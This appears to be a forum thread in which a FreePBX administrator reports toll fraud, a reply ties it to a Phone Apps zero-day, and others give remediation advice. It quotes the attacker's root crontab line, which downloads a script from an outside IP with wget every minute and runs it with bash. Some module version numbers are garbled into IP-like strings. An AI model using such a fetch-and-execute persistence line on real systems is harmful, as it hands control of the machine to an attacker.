December 25, 2021, 4:58pm
I received a warning from my telephone company today about possible unauthorized international calls from my PBX.
While looking into the installation I stumbled upon the following root crontab entry:
*/1 * * * * wget
http://220.127.116.11/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
The IP address has no reverse DNS and according to whois belongs to a company in the Netherlands. Also, the downloaded k.php looks quite fishy.
FreePBX installed from SNG7-PBX16-64bit-2105-7.iso
December 25, 2021, 5:21pm
Yes, your system has been hacked. Don’t try to clean it up. Reinstall a clean .iso and restore from a backup taken before the attack. Most likely, the cause is
On the afternoon of December 21, 2021 Sangoma received a report of malicious activity in progress on a fully up to date FreePBX 15 system. Technical details followed very quickly, and engineering was able to act within minutes of the report. Investigation revealed that the vulnerability to be in the FreePBX and PBXact Phone Apps (restapps) module, in published versions 18.104.22.168, 22.214.171.124, 126.96.36.199 and 188.8.131.52. Other major FreePBX or PBXact versions are not affected. The affected module …
See also this discussion:
I was made aware of a new zero-day FreePBX exploit today - apparently it affects Phone Apps, even if you’re not using Phone Apps in a licensed capacity.
Does anyone have any information on this? Apparently, and earlier post on the subject was pulled down? Do we have any sort of statement from Sangoma or an ETA for a security fix? Should we be closing down the public facing Phone Apps port for all customers?
If your system had been updated to one of the vulnerable versions, it is almost certain that this is what happened.
To reduce the chance of similar incidents in the future, ensure that any kind of web access to the PBX (admin, UCP, REST, etc.) is restricted to whitelisted IP addresses.
December 25, 2021, 5:31pm
Thank you very much. I will do a fresh install. Obviously, I must also consider my configured SIP passwords stolen and will need to change them.
December 26, 2021, 1:37pm
Just to make sure: Is SNG7-PBX16-64bit-2112-4.iso (downloaded yesterday) already patched against this exploit?
December 26, 2021, 2:05pm
Looking at the release notes it was released before the patches. Full ISO aren’t usually released that often. I would suggest running all updates anyway before restoring any backup or putting into production as part of any install.
December 26, 2021, 2:37pm
Thanks for quick reply
fwconsole ma upgradeall
Anything else to update?
December 26, 2021, 2:38pm
Remember to do a reload after updating.
January 25, 2022, 2:39pm
This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.